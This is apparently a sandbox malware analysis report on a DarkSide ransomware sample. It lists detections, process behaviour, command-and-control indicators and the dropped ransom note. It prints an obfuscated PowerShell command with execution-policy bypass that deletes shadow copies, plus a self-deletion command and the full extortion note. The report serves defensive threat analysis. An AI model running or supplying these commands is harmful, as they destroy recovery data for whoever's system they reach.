Loading ...

Play interactive tourEdit tour

Analysis Report rUUR0qQI22

Overview

General Information

Sample Name:rUUR0qQI22 (renamed file extension from none to exe)
Analysis ID:401962
MD5:9d418ecc0f3bf45029263b0944236884
SHA1:eeb28144f39b275ee1ec008859e80f215710dc57
SHA256:151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Tags:DarkSideRansomware
Infos:

Most interesting Screenshot:

Detection

DarkSide
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkSide Ransomware
Bypasses PowerShell execution policy
Contains functionalty to change the wallpaper
Deletes itself after installation
Found Tor onion address
Machine Learning detection for sample
Obfuscated command line found
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • rUUR0qQI22.exe (PID: 3508 cmdline: 'C:\Users\user\Desktop\rUUR0qQI22.exe' MD5: 9D418ECC0F3BF45029263B0944236884)
    • powershell.exe (PID: 1004 cmdline: powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 8768 cmdline: 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
rUUR0qQI22.exeUnspecified_Malware_Sep1_A1Detects malware from DrqgonFly APT reportFlorian Roth

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\README.418990b0.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
      C:\README.418990b0.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
        C:\README.418990b0.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
            00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
              00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                  00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.rUUR0qQI22.exe.ce0000.1.unpackUnspecified_Malware_Sep1_A1Detects malware from DrqgonFly APT reportFlorian Roth
                      0.0.rUUR0qQI22.exe.ce0000.0.unpackUnspecified_Malware_Sep1_A1Detects malware from DrqgonFly APT reportFlorian Roth

                        Sigma Overview

                        No Sigma rule has matched

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: rUUR0qQI22.exeAvira: detected
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: rUUR0qQI22.exeReversingLabs: Detection: 93%
                        Machine Learning detection for sampleShow sources
                        Source: rUUR0qQI22.exeJoe Sandbox ML: detected
                        Source: rUUR0qQI22.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\\README.418990b0.TXTJump to behavior
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\Recovery\README.418990b0.TXTJump to behavior
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\Users\README.418990b0.TXTJump to behavior
                        Source: rUUR0qQI22.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome

                        Networking:

                        barindex
                        Found Tor onion addressShow sources
                        Source: README.418990b0.TXT.0.drString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
                        Source: Joe Sandbox ViewIP Address: 185.105.109.19 185.105.109.19
                        Source: global trafficTCP traffic: 192.168.2.3:49717 -> 185.105.109.19:443
                        Source: unknownDNS traffic detected: queries for: securebestapp20.com
                        Source: powershell.exe, 00000006.00000002.287565271.00000165FE112000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: README.418990b0.TXT.0.drString found in binary or memory: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
                        Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: rUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBl
                        Source: rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBlO
                        Source: README.418990b0.TXT.0.drString found in binary or memory: https://torproject.org/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

                        Spam, unwanted Advertisements and Ransom Demands:

                        barindex
                        Found ransom note / readmeShow sources
                        Source: C:\README.418990b0.TXTDropped file: ----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!Jump to dropped file
                        Yara detected DarkSide RansomwareShow sources
                        Source: Yara matchFile source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\README.418990b0.TXT, type: DROPPED
                        Source: Yara matchFile source: C:\README.418990b0.TXT, type: DROPPED
                        Source: Yara matchFile source: C:\README.418990b0.TXT, type: DROPPED
                        Contains functionalty to change the wallpaperShow sources
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4255 CreateFontW,RtlFreeHeap,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,SelectObject,SHGetSpecialFolderPathW,PathAddBackslashW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,RegOpenKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RegCloseKey,CloseHandle,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: rUUR0qQI22.exe, type: SAMPLEMatched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
                        Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
                        Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4DDA RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,wcslen,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE7E5D NtSetInformationThread,IsUserAnAdmin,GetCommandLineW,CommandLineToArgvW,_wcsicmp,wcsrchr,_wcsicmp,wcsrchr,_wcsicmp,OpenMutexW,CreateMutexW,CloseHandle,CloseHandle,CloseHandle,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4C32 NtSetInformationProcess,NtSetInformationProcess,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE56F9 CreateFileW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,GetCurrentProcessId,RtlFreeHeap,CloseHandle,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5787 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE285C NtQueryInformationProcess,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE585D NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5650 NtQueryInformationFile,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5765 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE587F NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4E18 NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4E3A NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4C7B OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE209C
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4819
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAEE888169
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAEE888F19
                        Source: rUUR0qQI22.exe, 00000000.00000002.429547362.0000000000B40000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs rUUR0qQI22.exe
                        Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs rUUR0qQI22.exe
                        Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs rUUR0qQI22.exe
                        Source: rUUR0qQI22.exe, 00000000.00000002.429940296.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs rUUR0qQI22.exe
                        Source: rUUR0qQI22.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: rUUR0qQI22.exe, type: SAMPLEMatched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPEMatched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@6/10@1/2
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE4B67 OpenProcessToken,GetTokenInformation,RtlAllocateHeap,GetTokenInformation,AdjustTokenPrivileges,RtlFreeHeap,CloseHandle,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE2C69 GetLogicalDriveStringsW,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcsrchr,wcslen,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\Users\user\AppData\Local\418990b0.icoJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeMutant created: \Sessions\1\BaseNamedObjects\Global\0ab00e5f701610d7524fc82247c75e80
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_01
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1Jump to behavior
                        Source: rUUR0qQI22.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: rUUR0qQI22.exeReversingLabs: Detection: 93%
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile read: C:\Users\user\Desktop\rUUR0qQI22.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\rUUR0qQI22.exe 'C:\Users\user\Desktop\rUUR0qQI22.exe'
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: rUUR0qQI22.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: rUUR0qQI22.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation:

                        barindex
                        Obfuscated command line foundShow sources
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: rUUR0qQI22.exeStatic PE information: real checksum: 0xfa78 should be: 0x16ef0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAEE881FA7 push esp; retf
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\\README.418990b0.TXTJump to behavior
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\Recovery\README.418990b0.TXTJump to behavior
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile created: C:\Users\README.418990b0.TXTJump to behavior

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Deletes itself after installationShow sources
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
